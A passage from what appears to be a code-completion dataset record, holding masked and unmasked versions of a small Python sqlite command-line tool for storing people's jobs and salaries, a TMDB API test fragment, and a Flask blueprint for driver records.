self.assertTrue(int(response.status_code) == 200)\n data = response.json()\n self.assertTrue(data['id'])\n self.assertTrue(data['name'])\n # TODO check if all the shows are in the good format (can be from_dict/to_dict)\n\n def test_similar(self):\n \"\"\" Testing the TMDB API similar endpoint \"\"\"\n response = Tmdb.similar(69740)\n self.assertTrue(int(response.status_code) == 200)\n data = response.json()\n self.assertTrue(isinstance(data['results'], list))\n # TODO check if all the shows are in the good format (can be from_dict/to_dict)\n \n def test_seasons(self):\n \"\"\" Testing the TMDB API seasons endpoint \"\"\"\n response = Tmdb.season(tmdb_show_id = 69740, season_number = 1)\n self.assertTrue(int(response.status_code) == 200)\n data = response.json()\n self.assertTrue(isinstance(data['episodes'], list))\n # TODO check if all the shows are in the good format (can be from_dict/to_dict)\n \n\nif __name__ == '__main__':\n unittest.main()\n",
"step-ids": [
4,
5,
6,
7,
10
]
}
|
[
4,
5,
6,
7,
10
] |
<|reserved_special_token_0|>
class Person:
def __init__(self, name, surname, job, salary):
self.name = name
self.surname = surname
self.job = job
self.salary = salary
def create(name):
conn = db.connect(name + '.db')
c = conn.cursor()
c.execute(
"""CREATE TABLE first(
id integer PRIMARY KEY AUTOINCREMENT,
name text,
surname text
)"""
)
c.execute(
"""CREATE TABLE second(
id integer PRIMARY KEY AUTOINCREMENT,
surname text,
job text,
salary integer,
FOREIGN KEY(id) REFERENCES first(id),
FOREIGN KEY(surname) REFERENCES first(surname)
)"""
)
conn.commit()
conn.close()
<|reserved_special_token_0|>
def insert():
name = input('Enter your name: ')
surname = input('Enter your surname: ')
confirm = input('Have you got a job? ')
if 'y' in confirm:
job = input('What kind of job you have? ')
salary = input('How much they pay for you? ')
surname = Person(name, surname, job, salary)
persons.append(surname)
database(surname)
else:
print('We need a humans with job, bye')
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
os.system('clear')
<|reserved_special_token_0|>
class Person:
def __init__(self, name, surname, job, salary):
self.name = name
self.surname = surname
self.job = job
self.salary = salary
def create(name):
conn = db.connect(name + '.db')
c = conn.cursor()
c.execute(
"""CREATE TABLE first(
id integer PRIMARY KEY AUTOINCREMENT,
name text,
surname text
)"""
)
c.execute(
"""CREATE TABLE second(
id integer PRIMARY KEY AUTOINCREMENT,
surname text,
job text,
salary integer,
FOREIGN KEY(id) REFERENCES first(id),
FOREIGN KEY(surname) REFERENCES first(surname)
)"""
)
conn.commit()
conn.close()
def database(s):
conn = db.connect(sqldb + '.db')
c = conn.cursor()
c.execute('INSERT INTO first(name, surname) VALUES(?, ?)', (s.name, s.
surname))
c.execute('INSERT INTO second(surname, job, salary) VALUES(?, ?, ?)', (
s.surname, s.job, s.salary))
conn.commit()
conn.close()
def insert():
name = input('Enter your name: ')
surname = input('Enter your surname: ')
confirm = input('Have you got a job? ')
if 'y' in confirm:
job = input('What kind of job you have? ')
salary = input('How much they pay for you? ')
surname = Person(name, surname, job, salary)
persons.append(surname)
database(surname)
else:
print('We need a humans with job, bye')
while True:
command = input('>> ')
if command == 'insert':
insert()
elif command == 'list':
for i in persons:
print(i.surname)
continue
elif command == 'create database':
sqldb = input('Enter the name of new database: ')
create(sqldb)
elif command == 'clear' or command == 'cls':
loc = os.getcwd()
if 'C:' in loc or 'D:' in loc:
os.system('cls')
else:
os.system('clear')
else:
print('No command found')
continue
<|reserved_special_token_1|>
<|reserved_special_token_0|>
os.system('clear')
persons = []
class Person:
def __init__(self, name, surname, job, salary):
self.name = name
self.surname = surname
self.job = job
self.salary = salary
def create(name):
conn = db.connect(name + '.db')
c = conn.cursor()
c.execute(
"""CREATE TABLE first(
id integer PRIMARY KEY AUTOINCREMENT,
name text,
surname text
)"""
)
c.execute(
"""CREATE TABLE second(
id integer PRIMARY KEY AUTOINCREMENT,
surname text,
job text,
salary integer,
FOREIGN KEY(id) REFERENCES first(id),
FOREIGN KEY(surname) REFERENCES first(surname)
)"""
)
conn.commit()
conn.close()
def database(s):
conn = db.connect(sqldb + '.db')
c = conn.cursor()
c.execute('INSERT INTO first(name, surname) VALUES(?, ?)', (s.name, s.
surname))
c.execute('INSERT INTO second(surname, job, salary) VALUES(?, ?, ?)', (
s.surname, s.job, s.salary))
conn.commit()
conn.close()
def insert():
name = input('Enter your name: ')
surname = input('Enter your surname: ')
confirm = input('Have you got a job? ')
if 'y' in confirm:
job = input('What kind of job you have? ')
salary = input('How much they pay for you? ')
surname = Person(name, surname, job, salary)
persons.append(surname)
database(surname)
else:
print('We need a humans with job, bye')
while True:
command = input('>> ')
if command == 'insert':
insert()
elif command == 'list':
for i in persons:
print(i.surname)
continue
elif command == 'create database':
sqldb = input('Enter the name of new database: ')
create(sqldb)
elif command == 'clear' or command == 'cls':
loc = os.getcwd()
if 'C:' in loc or 'D:' in loc:
os.system('cls')
else:
os.system('clear')
else:
print('No command found')
continue
<|reserved_special_token_1|>
import os
import sqlite3 as db
os.system('clear')
persons = []
class Person:
def __init__(self, name, surname, job, salary):
self.name = name
self.surname = surname
self.job = job
self.salary = salary
def create(name):
conn = db.connect(name + '.db')
c = conn.cursor()
c.execute(
"""CREATE TABLE first(
id integer PRIMARY KEY AUTOINCREMENT,
name text,
surname text
)"""
)
c.execute(
"""CREATE TABLE second(
id integer PRIMARY KEY AUTOINCREMENT,
surname text,
job text,
salary integer,
FOREIGN KEY(id) REFERENCES first(id),
FOREIGN KEY(surname) REFERENCES first(surname)
)"""
)
conn.commit()
conn.close()
def database(s):
conn = db.connect(sqldb + '.db')
c = conn.cursor()
c.execute('INSERT INTO first(name, surname) VALUES(?, ?)', (s.name, s.
surname))
c.execute('INSERT INTO second(surname, job, salary) VALUES(?, ?, ?)', (
s.surname, s.job, s.salary))
conn.commit()
conn.close()
def insert():
name = input('Enter your name: ')
surname = input('Enter your surname: ')
confirm = input('Have you got a job? ')
if 'y' in confirm:
job = input('What kind of job you have? ')
salary = input('How much they pay for you? ')
surname = Person(name, surname, job, salary)
persons.append(surname)
database(surname)
else:
print('We need a humans with job, bye')
while True:
command = input('>> ')
if command == 'insert':
insert()
elif command == 'list':
for i in persons:
print(i.surname)
continue
elif command == 'create database':
sqldb = input('Enter the name of new database: ')
create(sqldb)
elif command == 'clear' or command == 'cls':
loc = os.getcwd()
if 'C:' in loc or 'D:' in loc:
os.system('cls')
else:
os.system('clear')
else:
print('No command found')
continue
<|reserved_special_token_1|>
import os
import sqlite3 as db
os.system('clear')
persons = []
class Person:
def __init__(self, name, surname, job, salary):
self.name = name
self.surname = surname
self.job = job
self.salary = salary
def create(name):
conn = db.connect(name + '.db')
c = conn.cursor()
c.execute("""CREATE TABLE first(
id integer PRIMARY KEY AUTOINCREMENT,
name text,
surname text
)""")
c.execute("""CREATE TABLE second(
id integer PRIMARY KEY AUTOINCREMENT,
surname text,
job text,
salary integer,
FOREIGN KEY(id) REFERENCES first(id),
FOREIGN KEY(surname) REFERENCES first(surname)
)""")
conn.commit()
conn.close()
def database(s):
conn = db.connect(sqldb+'.db')
c = conn.cursor()
c.execute('INSERT INTO first(name, surname) VALUES(?, ?)', (s.name, s.surname))
c.execute('INSERT INTO second(surname, job, salary) VALUES(?, ?, ?)', (s.surname, s.job, s.salary))
conn.commit()
conn.close()
def insert():
name = input('Enter your name: ')
surname = input('Enter your surname: ')
confirm = input('Have you got a job? ')
if 'y' in confirm:
job = input('What kind of job you have? ')
salary = input('How much they pay for you? ')
surname = Person(name, surname, job, salary)
persons.append(surname)
database(surname)
else:
print('We need a humans with job, bye')
while True:
command = input(">> ")
if command == 'insert':
insert()
elif command == 'list':
for i in persons:
print(i.surname)
continue
elif command == 'create database':
sqldb = input('Enter the name of new database: ')
create(sqldb)
elif command == 'clear' or command == 'cls':
loc = os.getcwd()
if 'C:' in loc or 'D:' in loc:
os.system('cls')
else:
os.system('clear')
else:
print('No command found')
continue
|
flexible
|
{
"blob_id": "7ff19ee35422395f78dca1e17a736df20a40ea98",
"index": 7569,
"step-1": "<mask token>\n\n\nclass Person:\n\n def __init__(self, name, surname, job, salary):\n self.name = name\n self.surname = surname\n self.job = job\n self.salary = salary\n\n\ndef create(name):\n conn = db.connect(name + '.db')\n c = conn.cursor()\n c.execute(\n \"\"\"CREATE TABLE first(\n\t\t\tid integer PRIMARY KEY AUTOINCREMENT,\n\t\t\tname text,\n\t\t\tsurname text\n\t\t)\"\"\"\n )\n c.execute(\n \"\"\"CREATE TABLE second(\n\t\t\tid integer PRIMARY KEY AUTOINCREMENT,\n\t\t\tsurname text,\n\t\t\tjob text,\n\t\t\tsalary integer,\n\t\t\tFOREIGN KEY(id) REFERENCES first(id),\n\t\t\tFOREIGN KEY(surname) REFERENCES first(surname)\n\t\t)\"\"\"\n )\n conn.commit()\n conn.close()\n\n\n<mask token>\n\n\ndef insert():\n name = input('Enter your name: ')\n surname = input('Enter your surname: ')\n confirm = input('Have you got a job? ')\n if 'y' in confirm:\n job = input('What kind of job you have? ')\n salary = input('How much they pay for you? ')\n surname = Person(name, surname, job, salary)\n persons.append(surname)\n database(surname)\n else:\n print('We need a humans with job, bye')\n\n\n<mask token>\n",
"step-2": "<mask token>\nos.system('clear')\n<mask token>\n\n\nclass Person:\n\n def __init__(self, name, surname, job, salary):\n self.name = name\n self.surname = surname\n self.job = job\n self.salary = salary\n\n\ndef create(name):\n conn = db.connect(name + '.db')\n c = conn.cursor()\n c.execute(\n \"\"\"CREATE TABLE first(\n\t\t\tid integer PRIMARY KEY AUTOINCREMENT,\n\t\t\tname text,\n\t\t\tsurname text\n\t\t)\"\"\"\n )\n c.execute(\n \"\"\"CREATE TABLE second(\n\t\t\tid integer PRIMARY KEY AUTOINCREMENT,\n\t\t\tsurname text,\n\t\t\tjob text,\n\t\t\tsalary integer,\n\t\t\tFOREIGN KEY(id) REFERENCES first(id),\n\t\t\tFOREIGN KEY(surname) REFERENCES first(surname)\n\t\t)\"\"\"\n )\n conn.commit()\n conn.close()\n\n\ndef database(s):\n conn = db.connect(sqldb + '.db')\n c = conn.cursor()\n c.execute('INSERT INTO first(name, surname) VALUES(?, ?)', (s.name, s.\n surname))\n c.execute('INSERT INTO second(surname, job, salary) VALUES(?, ?, ?)', (\n s.surname, s.job, s.salary))\n conn.commit()\n conn.close()\n\n\ndef insert():\n name = input('Enter your name: ')\n surname = input('Enter your surname: ')\n confirm = input('Have you got a job? ')\n if 'y' in confirm:\n job = input('What kind of job you have? ')\n salary = input('How much they pay for you? ')\n surname = Person(name, surname, job, salary)\n persons.append(surname)\n database(surname)\n else:\n print('We need a humans with job, bye')\n\n\nwhile True:\n command = input('>> ')\n if command == 'insert':\n insert()\n elif command == 'list':\n for i in persons:\n print(i.surname)\n continue\n elif command == 'create database':\n sqldb = input('Enter the name of new database: ')\n create(sqldb)\n elif command == 'clear' or command == 'cls':\n loc = os.getcwd()\n if 'C:' in loc or 'D:' in loc:\n os.system('cls')\n else:\n os.system('clear')\n else:\n print('No command found')\n continue\n",
"step-3": "<mask token>\nos.system('clear')\npersons = []\n\n\nclass Person:\n\n def __init__(self, name, surname, job, salary):\n self.name = name\n self.surname = surname\n self.job = job\n self.salary = salary\n\n\ndef create(name):\n conn = db.connect(name + '.db')\n c = conn.cursor()\n c.execute(\n \"\"\"CREATE TABLE first(\n\t\t\tid integer PRIMARY KEY AUTOINCREMENT,\n\t\t\tname text,\n\t\t\tsurname text\n\t\t)\"\"\"\n )\n c.execute(\n \"\"\"CREATE TABLE second(\n\t\t\tid integer PRIMARY KEY AUTOINCREMENT,\n\t\t\tsurname text,\n\t\t\tjob text,\n\t\t\tsalary integer,\n\t\t\tFOREIGN KEY(id) REFERENCES first(id),\n\t\t\tFOREIGN KEY(surname) REFERENCES first(surname)\n\t\t)\"\"\"\n )\n conn.commit()\n conn.close()\n\n\ndef database(s):\n conn = db.connect(sqldb + '.db')\n c = conn.cursor()\n c.execute('INSERT INTO first(name, surname) VALUES(?, ?)', (s.name, s.\n surname))\n c.execute('INSERT INTO second(surname, job, salary) VALUES(?, ?, ?)', (\n s.surname, s.job, s.salary))\n conn.commit()\n conn.close()\n\n\ndef insert():\n name = input('Enter your name: ')\n surname = input('Enter your surname: ')\n confirm = input('Have you got a job? ')\n if 'y' in confirm:\n job = input('What kind of job you have? ')\n salary = input('How much they pay for you? ')\n surname = Person(name, surname, job, salary)\n persons.append(surname)\n database(surname)\n else:\n print('We need a humans with job, bye')\n\n\nwhile True:\n command = input('>> ')\n if command == 'insert':\n insert()\n elif command == 'list':\n for i in persons:\n print(i.surname)\n continue\n elif command == 'create database':\n sqldb = input('Enter the name of new database: ')\n create(sqldb)\n elif command == 'clear' or command == 'cls':\n loc = os.getcwd()\n if 'C:' in loc or 'D:' in loc:\n os.system('cls')\n else:\n os.system('clear')\n else:\n print('No command found')\n continue\n",
"step-4": "import os\nimport sqlite3 as db\nos.system('clear')\npersons = []\n\n\nclass Person:\n\n def __init__(self, name, surname, job, salary):\n self.name = name\n self.surname = surname\n self.job = job\n self.salary = salary\n\n\ndef create(name):\n conn = db.connect(name + '.db')\n c = conn.cursor()\n c.execute(\n \"\"\"CREATE TABLE first(\n\t\t\tid integer PRIMARY KEY AUTOINCREMENT,\n\t\t\tname text,\n\t\t\tsurname text\n\t\t)\"\"\"\n )\n c.execute(\n \"\"\"CREATE TABLE second(\n\t\t\tid integer PRIMARY KEY AUTOINCREMENT,\n\t\t\tsurname text,\n\t\t\tjob text,\n\t\t\tsalary integer,\n\t\t\tFOREIGN KEY(id) REFERENCES first(id),\n\t\t\tFOREIGN KEY(surname) REFERENCES first(surname)\n\t\t)\"\"\"\n )\n conn.commit()\n conn.close()\n\n\ndef database(s):\n conn = db.connect(sqldb + '.db')\n c = conn.cursor()\n c.execute('INSERT INTO first(name, surname) VALUES(?, ?)', (s.name, s.\n surname))\n c.execute('INSERT INTO second(surname, job, salary) VALUES(?, ?, ?)', (\n s.surname, s.job, s.salary))\n conn.commit()\n conn.close()\n\n\ndef insert():\n name = input('Enter your name: ')\n surname = input('Enter your surname: ')\n confirm = input('Have you got a job? ')\n if 'y' in confirm:\n job = input('What kind of job you have? ')\n salary = input('How much they pay for you? ')\n surname = Person(name, surname, job, salary)\n persons.append(surname)\n database(surname)\n else:\n print('We need a humans with job, bye')\n\n\nwhile True:\n command = input('>> ')\n if command == 'insert':\n insert()\n elif command == 'list':\n for i in persons:\n print(i.surname)\n continue\n elif command == 'create database':\n sqldb = input('Enter the name of new database: ')\n create(sqldb)\n elif command == 'clear' or command == 'cls':\n loc = os.getcwd()\n if 'C:' in loc or 'D:' in loc:\n os.system('cls')\n else:\n os.system('clear')\n else:\n print('No command found')\n continue\n",
"step-5": "import os\nimport sqlite3 as db\n\nos.system('clear')\npersons = []\n\nclass Person:\n\tdef __init__(self, name, surname, job, salary):\n\t\tself.name = name\n\t\tself.surname = surname\n\t\tself.job = job\n\t\tself.salary = salary\n\ndef create(name):\n\tconn = db.connect(name + '.db')\n\tc = conn.cursor()\n\n\tc.execute(\"\"\"CREATE TABLE first(\n\t\t\tid integer PRIMARY KEY AUTOINCREMENT,\n\t\t\tname text,\n\t\t\tsurname text\n\t\t)\"\"\")\n\n\tc.execute(\"\"\"CREATE TABLE second(\n\t\t\tid integer PRIMARY KEY AUTOINCREMENT,\n\t\t\tsurname text,\n\t\t\tjob text,\n\t\t\tsalary integer,\n\t\t\tFOREIGN KEY(id) REFERENCES first(id),\n\t\t\tFOREIGN KEY(surname) REFERENCES first(surname)\n\t\t)\"\"\")\n\n\tconn.commit()\n\tconn.close()\t\n\ndef database(s):\n\tconn = db.connect(sqldb+'.db')\n\tc = conn.cursor()\n\tc.execute('INSERT INTO first(name, surname) VALUES(?, ?)', (s.name, s.surname))\n\tc.execute('INSERT INTO second(surname, job, salary) VALUES(?, ?, ?)', (s.surname, s.job, s.salary))\n\tconn.commit()\n\tconn.close()\n\ndef insert():\n\tname = input('Enter your name: ')\n\tsurname = input('Enter your surname: ')\n\tconfirm = input('Have you got a job? ')\n\tif 'y' in confirm:\n\t\tjob = input('What kind of job you have? ')\n\t\tsalary = input('How much they pay for you? ')\n\t\tsurname = Person(name, surname, job, salary)\n\t\tpersons.append(surname)\n\t\tdatabase(surname)\n\telse:\n\t\tprint('We need a humans with job, bye')\n\n\nwhile True:\n\tcommand = input(\">> \")\n\tif command == 'insert':\n\t\tinsert()\n\telif command == 'list':\n\t\tfor i in persons:\n\t\t\tprint(i.surname)\n\t\tcontinue\n\telif command == 'create database':\n\t\tsqldb = input('Enter the name of new database: ')\n\t\tcreate(sqldb)\n\telif command == 'clear' or command == 'cls':\n\t\tloc = os.getcwd()\n\t\tif 'C:' in loc or 'D:' in loc:\n\t\t\tos.system('cls')\n\t\telse:\n\t\t\tos.system('clear')\n\telse:\n\t\tprint('No command found')\n\t\tcontinue",
"step-ids": [
4,
6,
7,
8,
9
]
}
|
[
4,
6,
7,
8,
9
] |
<|reserved_special_token_0|>
@driver_api.route('/<int:driver_id>', methods=['PUT'])
def update(driver_id):
req_data = request.get_json()
data, error = driver_schema.load(req_data, partial=True)
if error:
return custom_response({'Error': 'Driver not found.'}, 400)
driver = DriverModel.get_one_driver(driver_id)
driver.update(data)
response = driver_schema.dump(driver).data
return custom_response(response, 200)
<|reserved_special_token_0|>
@driver_api.route('/list_not_loaded', methods=['GET'])
def list_truck_not_loaded():
driver = DriverModel.truck_not_loaded()
response = driver_schema.dump(driver, many=True).data
return custom_response(response, 200)
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
@driver_api.route('/', methods=['POST'])
def create():
req_data = request.get_json()
data, error = driver_schema.load(req_data)
if error:
return custom_response(error, 400)
driver_in_db = DriverModel.get_driver_by_name(data.get('name'))
if driver_in_db:
return custom_response({'Error': 'Driver already exist.'}, 400)
driver = DriverModel(data)
driver.save()
response = driver_schema.dump(driver).data
return custom_response(response, 201)
<|reserved_special_token_0|>
@driver_api.route('/<int:driver_id>', methods=['PUT'])
def update(driver_id):
req_data = request.get_json()
data, error = driver_schema.load(req_data, partial=True)
if error:
return custom_response({'Error': 'Driver not found.'}, 400)
driver = DriverModel.get_one_driver(driver_id)
driver.update(data)
response = driver_schema.dump(driver).data
return custom_response(response, 200)
@driver_api.route('/<int:driver_id>', methods=['DELETE'])
def delete(driver_id):
driver = DriverModel.get_one_driver(driver_id)
if not driver:
return custom_response({'Error': 'Driver not found.'}, 400)
driver.delete()
return custom_response({'Sucess': 'Driver deleted with sucess!'}, 200)
@driver_api.route('/list_not_loaded', methods=['GET'])
def list_truck_not_loaded():
driver = DriverModel.truck_not_loaded()
response = driver_schema.dump(driver, many=True).data
return custom_response(response, 200)
@driver_api.route('/list_trucks_owned', methods=['GET'])
def list_truck_owned():
driver = DriverModel.truck_owned()
response = driver_schema.dump(driver, many=True).data
return custom_response(response, 200)
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
@driver_api.route('/', methods=['POST'])
def create():
req_data = request.get_json()
data, error = driver_schema.load(req_data)
if error:
return custom_response(error, 400)
driver_in_db = DriverModel.get_driver_by_name(data.get('name'))
if driver_in_db:
return custom_response({'Error': 'Driver already exist.'}, 400)
driver = DriverModel(data)
driver.save()
response = driver_schema.dump(driver).data
return custom_response(response, 201)
@driver_api.route('/<int:driver_id>', methods=['GET'])
def get(driver_id):
driver = DriverModel.get_one_driver(driver_id)
if not driver:
return custom_response({'Error': 'Driver not found.'}, 404)
response = driver_schema.dump(driver).data
return custom_response(response, 200)
@driver_api.route('/<int:driver_id>', methods=['PUT'])
def update(driver_id):
req_data = request.get_json()
data, error = driver_schema.load(req_data, partial=True)
if error:
return custom_response({'Error': 'Driver not found.'}, 400)
driver = DriverModel.get_one_driver(driver_id)
driver.update(data)
response = driver_schema.dump(driver).data
return custom_response(response, 200)
@driver_api.route('/<int:driver_id>', methods=['DELETE'])
def delete(driver_id):
driver = DriverModel.get_one_driver(driver_id)
if not driver:
return custom_response({'Error': 'Driver not found.'}, 400)
driver.delete()
return custom_response({'Sucess': 'Driver deleted with sucess!'}, 200)
@driver_api.route('/list_not_loaded', methods=['GET'])
def list_truck_not_loaded():
driver = DriverModel.truck_not_loaded()
response = driver_schema.dump(driver, many=True).data
return custom_response(response, 200)
@driver_api.route('/list_trucks_owned', methods=['GET'])
def list_truck_owned():
driver = DriverModel.truck_owned()
response = driver_schema.dump(driver, many=True).data
return custom_response(response, 200)
def custom_response(response, status_code):
return Response(mimetype='application/json', response=json.dumps(
response), status=status_code)
<|reserved_special_token_1|>
from flask import request, json, Response, Blueprint
from ..models.DriverModel import DriverModel, DriverSchema
driver_api = Blueprint('drivers', __name__)
driver_schema = DriverSchema()
@driver_api.route('/', methods=['POST'])
def create():
req_data = request.get_json()
data, error = driver_schema.load(req_data)
if error:
return custom_response(error, 400)
driver_in_db = DriverModel.get_driver_by_name(data.get('name'))
if driver_in_db:
return custom_response({'Error': 'Driver already exist.'}, 400)
driver = DriverModel(data)
driver.save()
response = driver_schema.dump(driver).data
return custom_response(response, 201)
@driver_api.route('/<int:driver_id>', methods=['GET'])
def get(driver_id):
driver = DriverModel.get_one_driver(driver_id)
if not driver:
return custom_response({'Error': 'Driver not found.'}, 404)
response = driver_schema.dump(driver).data
return custom_response(response, 200)
@driver_api.route('/<int:driver_id>', methods=['PUT'])
def update(driver_id):
req_data = request.get_json()
data, error = driver_schema.load(req_data, partial=True)
if error:
return custom_response({'Error': 'Driver not found.'}, 400)
driver = DriverModel.get_one_driver(driver_id)
driver.update(data)
response = driver_schema.dump(driver).data
return custom_response(response, 200)
@driver_api.route('/<int:driver_id>', methods=['DELETE'])
def delete(driver_id):
driver = DriverModel.get_one_driver(driver_id)
if not driver:
return custom_response({'Error': 'Driver not found.'}, 400)
driver.delete()
return custom_response({'Sucess': 'Driver deleted with sucess!'}, 200)
@driver_api.route('/list_not_loaded', methods=['GET'])
def list_truck_not_loaded():
driver = DriverModel.truck_not_loaded()
response = driver_schema.dump(driver, many=True).data
return custom_response(response, 200)
@driver_api.route('/list_trucks_owned', methods=['GET'])
def list_truck_owned():
driver = DriverModel.truck_owned()
response = driver_schema.dump(driver, many=True).data
return custom_response(response, 200)
def custom_response(response, status_code):
return Response(mimetype='application/json', response=json.dumps(
response), status=status_code)
<|reserved_special_token_1|>
from flask import request, json, Response, Blueprint
from ..models.DriverModel import DriverModel, DriverSchema
driver_api = Blueprint('drivers', __name__)
driver_schema = DriverSchema()
@driver_api.route('/', methods=['POST'])
def create():
req_data = request.get_json()
data, error = driver_schema.load(req_data)
if error:
return custom_response(error, 400)
driver_in_db = DriverModel.get_driver_by_name(data.get('name'))
if driver_in_db:
return custom_response({'Error': 'Driver already exist.'}, 400)
driver = DriverModel(data)
driver.save()
response = driver_schema.dump(driver).data
return custom_response(response, 201)
@driver_api.route('/<int:driver_id>', methods=['GET'])
def get(driver_id):
driver = DriverModel.get_one_driver(driver_id)
if not driver:
return custom_response({'Error': 'Driver not found.'}, 404)
response = driver_schema.dump(driver).data
return custom_response(response, 200)
@driver_api.route('/<int:driver_id>', methods=['PUT'])
def update(driver_id):
req_data = request.get_json()
data, error = driver_schema.load(req_data, partial=True)
if error:
return custom_response({'Error': 'Driver not found.'}, 400)
driver = DriverModel.get_one_driver(driver_id)
driver.update(data)
response = driver_schema.dump(driver).data
return custom_response(response, 200)
@driver_api.route('/<int:driver_id>', methods=['DELETE'])
def delete(driver_id):
driver = DriverModel.get_one_driver(driver_id)
if not driver:
return custom_response({'Error': 'Driver not found.'}, 400)
driver.delete()
return custom_response({'Sucess': 'Driver deleted with sucess!'}, 200)
@driver_api.route('/list_not_loaded', methods=['GET'])
def list_truck_not_loaded():
driver = DriverModel.truck_not_loaded()
response = driver_schema.dump(driver, many=True).data
return custom_response(response, 200)
@driver_api.route('/list_trucks_owned', methods=['GET'])
def list_truck_owned():
driver = DriverModel.truck_owned()
response = driver_schema.dump(driver, many=True).data
return custom_response(response, 200)
def custom_response(response, status_code):
return Response(
mimetype="application/json",
response=json.dumps(response),
status=status_code
)
|
flexible
|
{
"blob_id": "ee7820d50b5020a787fbaf012480e8c70bc0ee41",
"index": 1690,
"step-1": "<mask token>\n\n\n@driver_api.route('/<int:driver_id>', methods=['PUT'])\ndef update(driver_id):\n req_data = request.get_json()\n data, error = driver_schema.load(req_data, partial=True)\n if error:\n return custom_response({'Error': 'Driver not found.'}, 400)\n driver = DriverModel.get_one_driver(driver_id)\n driver.update(data)\n response = driver_schema.dump(driver).data\n return custom_response(response, 200)\n\n\n<mask token>\n\n\n@driver_api.route('/list_not_loaded', methods=['GET'])\ndef list_truck_not_loaded():\n driver = DriverModel.truck_not_loaded()\n response = driver_schema.dump(driver, many=True).data\n return custom_response(response, 200)\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\n@driver_api.route('/', methods=['POST'])\ndef create():\n req_data = request.get_json()\n data, error = driver_schema.load(req_data)\n if error:\n return custom_response(error, 400)\n driver_in_db = DriverModel.get_driver_by_name(data.get('name'))\n if driver_in_db:\n return custom_response({'Error': 'Driver already exist.'}, 400)\n driver = DriverModel(data)\n driver.save()\n response = driver_schema.dump(driver).data\n return custom_response(response, 201)\n\n\n<mask token>\n\n\n@driver_api.route('/<int:driver_id>', methods=['PUT'])\ndef update(driver_id):\n req_data = request.get_json()\n data, error = driver_schema.load(req_data, partial=True)\n if error:\n return custom_response({'Error': 'Driver not found.'}, 400)\n driver = DriverModel.get_one_driver(driver_id)\n driver.update(data)\n response = driver_schema.dump(driver).data\n return custom_response(response, 200)\n\n\n@driver_api.route('/<int:driver_id>', methods=['DELETE'])\ndef delete(driver_id):\n driver = DriverModel.get_one_driver(driver_id)\n if not driver:\n return custom_response({'Error': 'Driver not found.'}, 400)\n driver.delete()\n return custom_response({'Sucess': 'Driver deleted with sucess!'}, 200)\n\n\n@driver_api.route('/list_not_loaded', methods=['GET'])\ndef list_truck_not_loaded():\n driver = DriverModel.truck_not_loaded()\n response = driver_schema.dump(driver, many=True).data\n return custom_response(response, 200)\n\n\n@driver_api.route('/list_trucks_owned', methods=['GET'])\ndef list_truck_owned():\n driver = DriverModel.truck_owned()\n response = driver_schema.dump(driver, many=True).data\n return custom_response(response, 200)\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\n@driver_api.route('/', methods=['POST'])\ndef create():\n req_data = request.get_json()\n data, error = driver_schema.load(req_data)\n if error:\n return custom_response(error, 400)\n driver_in_db = DriverModel.get_driver_by_name(data.get('name'))\n if driver_in_db:\n return custom_response({'Error': 'Driver already exist.'}, 400)\n driver = DriverModel(data)\n driver.save()\n response = driver_schema.dump(driver).data\n return custom_response(response, 201)\n\n\n@driver_api.route('/<int:driver_id>', methods=['GET'])\ndef get(driver_id):\n driver = DriverModel.get_one_driver(driver_id)\n if not driver:\n return custom_response({'Error': 'Driver not found.'}, 404)\n response = driver_schema.dump(driver).data\n return custom_response(response, 200)\n\n\n@driver_api.route('/<int:driver_id>', methods=['PUT'])\ndef update(driver_id):\n req_data = request.get_json()\n data, error = driver_schema.load(req_data, partial=True)\n if error:\n return custom_response({'Error': 'Driver not found.'}, 400)\n driver = DriverModel.get_one_driver(driver_id)\n driver.update(data)\n response = driver_schema.dump(driver).data\n return custom_response(response, 200)\n\n\n@driver_api.route('/<int:driver_id>', methods=['DELETE'])\ndef delete(driver_id):\n driver = DriverModel.get_one_driver(driver_id)\n if not driver:\n return custom_response({'Error': 'Driver not found.'}, 400)\n driver.delete()\n return custom_response({'Sucess': 'Driver deleted with sucess!'}, 200)\n\n\n@driver_api.route('/list_not_loaded', methods=['GET'])\ndef list_truck_not_loaded():\n driver = DriverModel.truck_not_loaded()\n response = driver_schema.dump(driver, many=True).data\n return custom_response(response, 200)\n\n\n@driver_api.route('/list_trucks_owned', methods=['GET'])\ndef list_truck_owned():\n driver = DriverModel.truck_owned()\n response = driver_schema.dump(driver, many=True).data\n return custom_response(response, 200)\n\n\ndef custom_response(response, status_code):\n return Response(mimetype='application/json', response=json.dumps(\n response), status=status_code)\n",
"step-4": "from flask import request, json, Response, Blueprint\nfrom ..models.DriverModel import DriverModel, DriverSchema\ndriver_api = Blueprint('drivers', __name__)\ndriver_schema = DriverSchema()\n\n\n@driver_api.route('/', methods=['POST'])\ndef create():\n req_data = request.get_json()\n data, error = driver_schema.load(req_data)\n if error:\n return custom_response(error, 400)\n driver_in_db = DriverModel.get_driver_by_name(data.get('name'))\n if driver_in_db:\n return custom_response({'Error': 'Driver already exist.'}, 400)\n driver = DriverModel(data)\n driver.save()\n response = driver_schema.dump(driver).data\n return custom_response(response, 201)\n\n\n@driver_api.route('/<int:driver_id>', methods=['GET'])\ndef get(driver_id):\n driver = DriverModel.get_one_driver(driver_id)\n if not driver:\n return custom_response({'Error': 'Driver not found.'}, 404)\n response = driver_schema.dump(driver).data\n return custom_response(response, 200)\n\n\n@driver_api.route('/<int:driver_id>', methods=['PUT'])\ndef update(driver_id):\n req_data = request.get_json()\n data, error = driver_schema.load(req_data, partial=True)\n if error:\n return custom_response({'Error': 'Driver not found.'}, 400)\n driver = DriverModel.get_one_driver(driver_id)\n driver.update(data)\n response = driver_schema.dump(driver).data\n return custom_response(response, 200)\n\n\n@driver_api.route('/<int:driver_id>', methods=['DELETE'])\ndef delete(driver_id):\n driver = DriverModel.get_one_driver(driver_id)\n if not driver:\n return custom_response({'Error': 'Driver not found.'}, 400)\n driver.delete()\n return custom_response({'Sucess': 'Driver deleted with sucess!'}, 200)\n\n\n@driver_api.route('/list_not_loaded', methods=['GET'])\ndef list_truck_not_loaded():\n driver = DriverModel.truck_not_loaded()\n response = driver_schema.dump(driver, many=True).data\n return custom_response(response, 200)\n\n\n@driver_api.route('/list_trucks_owned', methods=['GET'])\ndef list_truck_owned():\n driver = DriverModel.truck_owned()\n response = 